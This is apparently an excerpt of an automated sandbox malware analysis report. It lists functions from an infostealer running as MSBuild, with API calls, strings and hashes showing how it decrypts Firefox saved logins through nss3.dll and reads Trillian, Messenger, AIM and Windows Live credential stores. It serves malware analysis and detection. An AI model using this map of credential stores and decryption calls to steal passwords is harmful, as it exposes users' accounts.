Strings

PK11_GetInternalKeySlot, xrefs: 00410D31
PK11_FreeSlot, xrefs: 00410D3D
NSS_Shutdown, xrefs: 00410D25
NSS_Init, xrefs: 00410D1D
nss3.dll, xrefs: 00410CB9, 00410CE2
PK11_Authenticate, xrefs: 00410D49
PK11SDR_Decrypt, xrefs: 00410D55

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: AddressProc$memset$CurrentDirectory$_mbscpystrlen$CloseEnvironmentExpandLibraryLoadStrings_mbscat
String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_FreeSlot$PK11_GetInternalKeySlot$nss3.dll
API String ID: 2719586705-3659000792
Opcode ID: 75917a1aec9986030c83e97f8a6c26f5c534c2a98396f13b9efaf1f70b8442b1
Instruction ID: 3c436980af1a21df5e4856e841a29f4fe06fda5e66834ce9295461a77701cb90
Opcode Fuzzy Hash: 75917a1aec9986030c83e97f8a6c26f5c534c2a98396f13b9efaf1f70b8442b1
Instruction Fuzzy Hash: BB317671940308AFCB20EFB5DC89ECABBB8AF64704F10486EE185D3141DAB996C48F54

Function 00407C79 Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 143
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00407CDB
memset.MSVCRT ref: 00407CEF
memset.MSVCRT ref: 00407D09
memset.MSVCRT ref: 00407D1E
GetComputerNameA.KERNEL32(?,?), ref: 00407D40
GetUserNameA.ADVAPI32(?,?), ref: 00407D54
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407D73
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407D88
strlen.MSVCRT ref: 00407D91
strlen.MSVCRT ref: 00407DA0
memcpy.MSVCRT(?,000000A3,00000010,?,?), ref: 00407DB2

Strings

5, xrefs: 00407CBD
H, xrefs: 00407CD1
}, xrefs: 00407CC1
O, xrefs: 00407CC5
b, xrefs: 00407CA9
}, xrefs: 00407CCD
i, xrefs: 00407CA1

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
String ID: 5$H$O$b$i$}$}
API String ID: 1832431107-3760989150
Opcode ID: fa53add491d98d1486bc50851db0f2d2053b3cdea30a1b6f38a2d4001a04f200
Instruction ID: c5d11ab3608301e1d6334a6842c6e335c593dc938f6648a4795a3d5a3f6caa6c
Opcode Fuzzy Hash: fa53add491d98d1486bc50851db0f2d2053b3cdea30a1b6f38a2d4001a04f200
Instruction Fuzzy Hash: 0951D671C0025DFEDB11CFA4CC81AEEBBBCEF49314F0481AAE555A6181D3389B85CBA5

Function 004110AF Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(psapi.dll,?,00411155,00404495,00000000,00000000,00000000), ref: 004110C2
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 004110DB
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004110EC
GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 004110FD
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041110E
GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 0041111F
FreeLibrary.KERNEL32(00000000), ref: 0041113F

Strings

psapi.dll, xrefs: 004110BD
EnumProcesses, xrefs: 00411108
GetModuleFileNameExA, xrefs: 004110F7
GetModuleInformation, xrefs: 00411119
EnumProcessModules, xrefs: 004110E6
GetModuleBaseNameA, xrefs: 004110D5

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: AddressProc$Library$FreeLoad
String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
API String ID: 2449869053-232097475
Opcode ID: ee84c210bc0f50ddd9e1354071252ba1724dd235f625d6dd127ec76221b6c85c
Instruction ID: 150d9d7abe9eb73bde655d9ea944b9d4c8ac0ad9fe74c99b0592c1ab8213f4a8
Opcode Fuzzy Hash: ee84c210bc0f50ddd9e1354071252ba1724dd235f625d6dd127ec76221b6c85c
Instruction Fuzzy Hash: CA01B138941212FAC7209F26AD04BE77EE4578CB94F14803BEA04D1669EB7884828A6C

Function 004064FB Relevance: 19.7, APIs: 10, Strings: 3, Instructions: 158
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00410C4C: memset.MSVCRT ref: 00410C6D
Part of subcall function 00410C4C: GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00410C92
Part of subcall function 00410C4C: SetCurrentDirectoryA.KERNEL32(?), ref: 00410C9F
Part of subcall function 00410C4C: memset.MSVCRT ref: 00410CB4
Part of subcall function 00410C4C: strlen.MSVCRT ref: 00410CBE
Part of subcall function 00410C4C: strlen.MSVCRT ref: 00410CCC
Part of subcall function 00410C4C: LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 00410D0B
Part of subcall function 00410C4C: GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 00410D23
Part of subcall function 00410C4C: GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 00410D2F
Part of subcall function 00410C4C: GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 00410D3B
Part of subcall function 00410C4C: GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 00410D47
Part of subcall function 00410C4C: GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 00410D53
Part of subcall function 00410C4C: GetProcAddress.KERNEL32(?,PK11SDR_Decrypt), ref: 00410D5F

memset.MSVCRT ref: 00406537

Part of subcall function 00406958: strlen.MSVCRT ref: 0040695D
Part of subcall function 00406958: memcpy.MSVCRT(00000000,00000000,00000000,00000000,0040D450,trillian,?,?,?,?,?,00000000,00000000), ref: 00406972

memset.MSVCRT ref: 0040657E
memset.MSVCRT ref: 00406596
memset.MSVCRT ref: 004065AE
strlen.MSVCRT ref: 004065B9
strlen.MSVCRT ref: 004065C7
strlen.MSVCRT ref: 004065F2
strlen.MSVCRT ref: 00406600
strlen.MSVCRT ref: 0040662B
strlen.MSVCRT ref: 00406639

Part of subcall function 004069D3: GetFileAttributesA.KERNELBASE(0040390F,0040D4DB,0040390F,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004069D7

Part of subcall function 004062DB: GetFileSize.KERNEL32(00000000,00000000), ref: 00406306
Part of subcall function 004062DB: ??2@YAPAXI@Z.MSVCRT(00000001), ref: 0040631A
Part of subcall function 004062DB: memset.MSVCRT ref: 00406349
Part of subcall function 004062DB: memset.MSVCRT ref: 00406368
Part of subcall function 004062DB: memset.MSVCRT ref: 0040637A
Part of subcall function 004062DB: strcmp.MSVCRT ref: 004063B9
Part of subcall function 004062DB: ??3@YAXPAX@Z.MSVCRT(?), ref: 004064E5
Part of subcall function 004062DB: CloseHandle.KERNEL32(?), ref: 004064EE

Strings

signons3.txt, xrefs: 00406631, 00406636, 00406647
signons.txt, xrefs: 004065BF, 004065C4, 004065D5
signons2.txt, xrefs: 004065F8, 004065FD, 0040660E

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: memsetstrlen$AddressProc$CurrentDirectoryFile$??2@??3@AttributesCloseHandleLibraryLoadSizememcpystrcmp
String ID: signons.txt$signons2.txt$signons3.txt
API String ID: 4081699353-561706229
Opcode ID: 7da170244c5e44e2ab2624a41fc5cd2ef5c298c791df7e28cb4a8979ce54e25b
Instruction ID: 377b3a65c9dd8df244cffc1a210365992fa2ecb4602db1b88cb694f2acf2e346
Opcode Fuzzy Hash: 7da170244c5e44e2ab2624a41fc5cd2ef5c298c791df7e28cb4a8979ce54e25b
Instruction Fuzzy Hash: C051C47280401CAACF11EA65DC85BCE7BACAF15319F5504BFF509F2181EB389B988B58

Function 0040D3A0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 109
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 0040D3C8

Part of subcall function 00411DAE: RegCloseKey.ADVAPI32(00000000,?,00000000,00000000), ref: 00411DE3

_mbscpy.MSVCRT(00403A14,00000000,?,?,?,?,?,00000000,00000000), ref: 0040D41B
_mbscpy.MSVCRT(00403A14,00000000,?,?,?,?,?,00000000,00000000), ref: 0040D464
memset.MSVCRT ref: 0040D47C
strlen.MSVCRT ref: 0040D49D
strlen.MSVCRT ref: 0040D4AB

Part of subcall function 00407139: strlen.MSVCRT ref: 0040714B
Part of subcall function 00407139: strlen.MSVCRT ref: 00407153
Part of subcall function 00407139: _memicmp.MSVCRT ref: 00407171

Part of subcall function 004069D3: GetFileAttributesA.KERNELBASE(0040390F,0040D4DB,0040390F,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004069D7

Strings

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Trillian, xrefs: 0040D3D3
Trillian\users\global, xrefs: 0040D492, 0040D4C1
trillian.exe, xrefs: 0040D3EF
UninstallString, xrefs: 0040D3CE
trillian, xrefs: 0040D444

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: strlen$_mbscpymemset$AttributesCloseFile_memicmp
String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Trillian$Trillian\users\global$UninstallString$trillian$trillian.exe
API String ID: 2174551368-3003071570
Opcode ID: e259f277b1496aa0bd8dd7d471ad79ad235791e513a4ae2e0a80bbcb3c597bbd
Instruction ID: 7bc3b858bee9d9e9ac8f81dd2a2494a9b2267e2ac629f59b21fbbbeb3bb54d2f
Opcode Fuzzy Hash: e259f277b1496aa0bd8dd7d471ad79ad235791e513a4ae2e0a80bbcb3c597bbd
Instruction Fuzzy Hash: 72312B7290421469E720AA659C46BDF3B988F11715F20007FF548F71C2DEBCAAC487AD

Function 004103F1 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 99
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,75A8EC10,00000000,?,0040DCC1,?), ref: 0041041E
RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,75A8EC10,00000000,?,0040DCC1,?), ref: 00410436
RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,75A8EC10,00000000,?,0040DCC1), ref: 0041045F
RegCloseKey.ADVAPI32(?,?,75A8EC10,00000000,?,0040DCC1), ref: 00410509

Part of subcall function 00404C9D: LoadLibraryA.KERNELBASE(crypt32.dll,00000000,00404771,?,?), ref: 00404CAA
Part of subcall function 00404C9D: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00404CBC

memcpy.MSVCRT(?,0041B008,00000040,75A8EC10,?,?,?,75A8EC10,00000000), ref: 004104C8
memcpy.MSVCRT(?,?,?), ref: 004104DD

Part of subcall function 004100A4: RegOpenKeyExA.ADVAPI32(004104FD,Creds,00000000,00020019,004104FD,00000040,0041B008,?,?,004104FD,?,?,?,?), ref: 004100C8
Part of subcall function 004100A4: memset.MSVCRT ref: 004100EA
Part of subcall function 004100A4: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 004101E7
Part of subcall function 004100A4: RegCloseKey.ADVAPI32(?), ref: 004101F8

LocalFree.KERNEL32(0040DCC1,75A8EC10,?,?,?,75A8EC10,00000000), ref: 00410500
RegCloseKey.KERNELBASE(?,?,75A8EC10,00000000,?,0040DCC1,?), ref: 00410512

Strings

Software\Microsoft\IdentityCRL, xrefs: 00410414
Value, xrefs: 00410450
Dynamic Salt, xrefs: 0041042E

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value
API String ID: 2768085393-888555734
Opcode ID: d648e9b0c95eff2677d72af7b673b930fecaf3740d0545a91529973bbe74cb9a
Instruction ID: a3322e4f6880ec2e25c1dd16e8e651f617ea5ab7975a499ff40f994b3e8bdadf
Opcode Fuzzy Hash: d648e9b0c95eff2677d72af7b673b930fecaf3740d0545a91529973bbe74cb9a
Instruction Fuzzy Hash: B631E7B690011DABDB119B95EC45EEFBBBDEF48348F004066FA05F2111E7749A848BA8

Function 00413E10 Relevance: 18.1, APIs: 12, Instructions: 128
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000,004153E0,00000070), ref: 00413E25
__set_app_type.MSVCRT ref: 00413E7E
__p__fmode.MSVCRT ref: 00413E93
__p__commode.MSVCRT ref: 00413EA1
__setusermatherr.MSVCRT ref: 00413ECD
_initterm.MSVCRT ref: 00413EE3
__getmainargs.MSVCRT ref: 00413F06
_initterm.MSVCRT ref: 00413F19
GetStartupInfoA.KERNEL32(?), ref: 00413F58
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00413F7C
exit.KERNELBASE ref: 00413F8F
_cexit.MSVCRT ref: 00413F95

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
String ID:
API String ID: 3662548030-0
Opcode ID: fd272f140936dce3ae1afac1b88f1a03475efbe3cea9d1dc08f67c2601f9b4d4
Instruction ID: 1a0d48d648a4d99901fb7feaec5c467672ee51f091280c2f058e756afb183587
Opcode Fuzzy Hash: fd272f140936dce3ae1afac1b88f1a03475efbe3cea9d1dc08f67c2601f9b4d4
Instruction Fuzzy Hash: 9841A071D00309DFDB209FA4D884AEE7BB4FB08715F20416BE46197291D7784AC2CB5C

Function 0040DA79 Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 198
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040FD01: memset.MSVCRT ref: 0040FD18
Part of subcall function 0040FD01: memset.MSVCRT ref: 0040FD21

RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\MSNMessenger,00000000,00020019,?), ref: 0040DACB

Part of subcall function 0040FF88: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,00000000,?,?,?), ref: 0041005B
Part of subcall function 0040FF88: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,00000000,?,?,?), ref: 00410071
Part of subcall function 0040FF88: LocalFree.KERNEL32(?,?,00000000,?,?,?), ref: 0041007D

RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\MessengerService,00000000,00020019,?), ref: 0040DB01
RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\MessengerService,00000000,00020019,?,?), ref: 0040DB8F
RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\MessengerService,00000000,00020019,?), ref: 0040DC25

Strings

UserMicrosoft Exchange Instant Messaging, xrefs: 0040DC3B
PasswordMicrosoft RTC Instant Messaging, xrefs: 0040DBA0
UserMicrosoft RTC Instant Messaging, xrefs: 0040DBA5
Software\Microsoft\MessengerService, xrefs: 0040DAF7, 0040DB85, 0040DC1B
Software\Microsoft\MSNMessenger, xrefs: 0040DAC1
PasswordMicrosoft Exchange Instant Messaging, xrefs: 0040DC36

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: Open$ByteCharMultiWidememset$FreeLocal
String ID: PasswordMicrosoft Exchange Instant Messaging$PasswordMicrosoft RTC Instant Messaging$Software\Microsoft\MSNMessenger$Software\Microsoft\MessengerService$UserMicrosoft Exchange Instant Messaging$UserMicrosoft RTC Instant Messaging
API String ID: 3472595403-3472580514
Opcode ID: 4a20be75106eef8afbc2690363f5f718c8396ca202439f642d4b7149e4ddfd6d
Instruction ID: 22d36e33a130c3ca974138f2eaaf9dbe6720f3348f6af52b077c8fd119907347
Opcode Fuzzy Hash: 4a20be75106eef8afbc2690363f5f718c8396ca202439f642d4b7149e4ddfd6d
Instruction Fuzzy Hash: CD711BB1D0025DAFDB10DFD5CD84AEEBBB8AB48309F5000BBE505B6241D7786A898B58

Function 0040BBF0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 82
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 0040BC14
GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 0040BC26
strrchr.MSVCRT ref: 0040BC35
_mbscat.MSVCRT ref: 0040BC4F
_mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040BC83
_mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040BC94
GetWindowPlacement.USER32(00000000,?), ref: 0040BCCE

Strings

General, xrefs: 0040BC8E
.cfg, xrefs: 0040BC49
WinPos, xrefs: 0040BCE2

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
String ID: .cfg$General$WinPos
API String ID: 1012775001-3165880290
Opcode ID: a0e6ba106d22b7fdb452a0395d51e5079dfe080821a02a89f5daf1cda0cefaef
Instruction ID: 4d3526ff516950935d38684931a8ffa2e994efc3bce567aa6e3141678cacb11c
Opcode Fuzzy Hash: a0e6ba106d22b7fdb452a0395d51e5079dfe080821a02a89f5daf1cda0cefaef
Instruction Fuzzy Hash: AC31B4729042189BDB11DB55DC45BCA77BC9F58704F0400FAE948AB282DBB45FC58FA8

Function 0040260A Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 93
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Software\America Online\AIM6\Passwords,00000000,00020019,?), ref: 00402638
memset.MSVCRT ref: 0040265A
memset.MSVCRT ref: 00402676
wcscpy.MSVCRT ref: 004026BD
RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,?), ref: 0040271B
RegCloseKey.ADVAPI32(?), ref: 00402724

Strings

Software\America Online\AIM6\Passwords, xrefs: 0040262E

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: memset$CloseEnumOpenValuewcscpy
String ID: Software\America Online\AIM6\Passwords
API String ID: 295685061-818317896
Opcode ID: a6e0e670a062fae4d46a71794003c79dd6e3f5cc49125a91a21113afdc381c0b
Instruction ID: 88eb4c74892045a3a61c352dacbb2536a85d96596cfce7057c4216d26753dbed
Opcode Fuzzy Hash: a6e0e670a062fae4d46a71794003c79dd6e3f5cc49125a91a21113afdc381c0b
Instruction Fuzzy Hash: F5311AB284011DAACB10DF91DC45EEFBBBCEF08344F1040A6A609F2180E77497998FA9

Function 004039A8 Relevance: 12.1, APIs: 3, Strings: 5, Instructions: 89
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00403A29
sprintf.MSVCRT ref: 00403A3B
_strcmpi.MSVCRT ref: 00403A61

Strings

AddExportHeaderLine, xrefs: 004039E6
MarkOddEvenRows, xrefs: 004039FA
Folder%d, xrefs: 00403A35
ShowGridLines, xrefs: 004039BE
SaveFilterIndex, xrefs: 004039D2

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: _strcmpimemsetsprintf
String ID: AddExportHeaderLine$Folder%d$MarkOddEvenRows$SaveFilterIndex$ShowGridLines
API String ID: 1148023869-3238971583
Opcode ID: 41c6a4aa87f640e3ff617832b964f26cfa69aff41829c8ca8a21bee419e69aaf
Instruction ID: b4f0ac16e309dff731b59d997bf236358cc0e702142a5422807362b934f22301
Opcode Fuzzy Hash: 41c6a4aa87f640e3ff617832b964f26cfa69aff41829c8ca8a21bee419e69aaf
Instruction Fuzzy Hash: A22143717041046BCB19DFA8CC86FAAB7F8BF08705F14446EB44A97181EA78AE848B59

Function 0040FA34 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 98stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FC4F: memset.MSVCRT ref: 0040FC6B
Part of subcall function 0040FC4F: memset.MSVCRT ref: 0040FC82
Part of subcall function 0040FC4F: _mbscat.MSVCRT ref: 0040FCAD
Part of subcall function 0040FC4F: _mbscat.MSVCRT ref: 0040FCD5

memset.MSVCRT ref: 0040FA77
strlen.MSVCRT ref: 0040FA8E
strlen.MSVCRT ref: 0040FA97
strlen.MSVCRT ref: 0040FAF0
strlen.MSVCRT ref: 0040FAFE

Part of subcall function 00406B4B: _mbscpy.MSVCRT(0040390F,00000000,0040390F,0040D4CE,00000000,Trillian\users\global), ref: 00406B53
Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62

Strings

history.dat, xrefs: 0040FA61, 0040FA94, 0040FAA5
places.sqlite, xrefs: 0040FAF7, 0040FB0C

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: strlen$_mbscatmemset$_mbscpy
String ID: history.dat$places.sqlite
API String ID: 29466866-467022611
Opcode ID: 6d4fa157046b79324614db1c5231b71ecc17b726e83c5fbb59575d794b89b698
Instruction ID: 51ac12969def4fbc614ccf7375ed6982ef447687ff00d0a07234f36c10d15357
Opcode Fuzzy Hash: 6d4fa157046b79324614db1c5231b71ecc17b726e83c5fbb59575d794b89b698
Instruction Fuzzy Hash: 7A313271D05118ABDB10EBA5DC85BDDBBB89F01319F1044BBE514F2181DB38AB89CB59

Function 004043E4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 81COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00404406
GetSystemDirectoryA.KERNEL32(0041E568,00000104), ref: 0040442B
_mbscpy.MSVCRT(?,0041E568,00000000,00000000,00000000), ref: 0040443E
memcpy.MSVCRT(?,0041DF00,0000010C,00000000,00000000,00000000), ref: 004044BD

Strings

hA, xrefs: 00404422
lsass.exe, xrefs: 00404480, 00404483

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: DirectorySystem_mbscpymemcpymemset
String ID: hA$lsass.exe
API String ID: 3651535325-1783533361
Opcode ID: 6d5ed3b0d0452b9c5b04e8167ed8392422c7da7f8cf5eefbc91479cdc521e7d4
Instruction ID: 0e5f66d5a96f37e034b058b5e8cd5d15c838e509caf2427c45d960fa31638fa3
Opcode Fuzzy Hash: 6d5ed3b0d0452b9c5b04e8167ed8392422c7da7f8cf5eefbc91479cdc521e7d4
Instruction Fuzzy Hash: 23213671C04298B9EB10DBB9EC057CEBF789B04308F0484BAD644A7191C7B98B88C7A9

Function 0040FC4F Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 59COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040FC6B
memset.MSVCRT ref: 0040FC82

Part of subcall function 0040680E: strlen.MSVCRT ref: 0040680F
Part of subcall function 0040680E: _mbscat.MSVCRT ref: 00406826

_mbscat.MSVCRT ref: 0040FCAD

Part of subcall function 0041223F: memset.MSVCRT ref: 00412297
Part of subcall function 0041223F: RegCloseKey.ADVAPI32(00000104,?,?,?,?,00000000,00000104), ref: 004122FE
Part of subcall function 0041223F: _mbscpy.MSVCRT(00000000,?,?,?,?,?,00000000,00000104), ref: 0041230C

_mbscat.MSVCRT ref: 0040FCD5

Strings

Mozilla\Firefox\Profiles, xrefs: 0040FCCF
Mozilla\Profiles, xrefs: 0040FCA7

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: _mbscatmemset$Close_mbscpystrlen
String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
API String ID: 3071782539-1174173950
Opcode ID: 6232208ba1a874a6dfbacdaeb12f5c4e8ca617f07066d97f4b76881872564654
Instruction ID: 7f5679cf0a8b8ad9b854585c07a42444415b2697a37b1dd070144bca98095891
Opcode Fuzzy Hash: 6232208ba1a874a6dfbacdaeb12f5c4e8ca617f07066d97f4b76881872564654
Instruction Fuzzy Hash: 67010CB3D4021C76DB2176655C86FCF7A2C5F60308F0408A6F548B7142D9BC9ED846A9

Function 0041212C Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B

RegCloseKey.KERNELBASE(0040D439,?,?,0040D439,?,?,?,?,?,00000000,00000000), ref: 00412167
GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,?,0040D439,?,?,?,?,?,00000000,00000000), ref: 00412178
_mbscat.MSVCRT ref: 00412188

Part of subcall function 00411D82: RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,?,00000008,00000008,?,0040275E,?,TRIPWD), ref: 00411D9B

Strings

:\Program Files, xrefs: 0041217E
ProgramFilesDir, xrefs: 00412150
SOFTWARE\Microsoft\Windows\CurrentVersion, xrefs: 00412137

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: CloseDirectoryOpenQueryValueWindows_mbscat
String ID: :\Program Files$ProgramFilesDir$SOFTWARE\Microsoft\Windows\CurrentVersion
API String ID: 3464146404-1099425022
Opcode ID: c60afe78d3be907601b0948d5127775a3db94f7b53ba6c2000afb81737aee508
Instruction ID: 662ef04aa31600ef20de70b7cf87d02e8b1ceff17a77a69e12e4cdaece8db846
Opcode Fuzzy Hash: c60afe78d3be907601b0948d5127775a3db94f7b53ba6c2000afb81737aee508
Instruction Fuzzy Hash: 2DF0E972508300BFE7119754AD07BCA7FE88F04314F20005BF644A0181FAE96EC0C29D

Function 004085B9 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON

Download Yara Rule

APIs

Part of subcall function 0040733E: free.MSVCRT ref: 00407341
Part of subcall function 0040733E: free.MSVCRT ref: 00407349

MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000800), ref: 00408661
_wcslwr.MSVCRT ref: 0040866E
wcslen.MSVCRT ref: 0040868B

Strings

/, xrefs: 00408697
/, xrefs: 004086A2

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: free$ByteCharMultiWide_wcslwrwcslen
String ID: /$/
API String ID: 4190021058-2523464752
Opcode ID: 09d1f8ade8d8357b66a16f8ed5e5d5d855b631777035325b7e6ae659001fd0a0
Instruction ID: 2a8444091b22e9eb4757945b889b84cf8c338ceadb4b858a9340bcb8d8787785
Opcode Fuzzy Hash: 09d1f8ade8d8357b66a16f8ed5e5d5d855b631777035325b7e6ae659001fd0a0
Instruction Fuzzy Hash: 5131A271500109EBDB11EF95CD819EEB3A8BF04345F10857EF585B3280DB78AE858BA8

Function 00407F7E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78registryCOMMON

Download Yara Rule

APIs

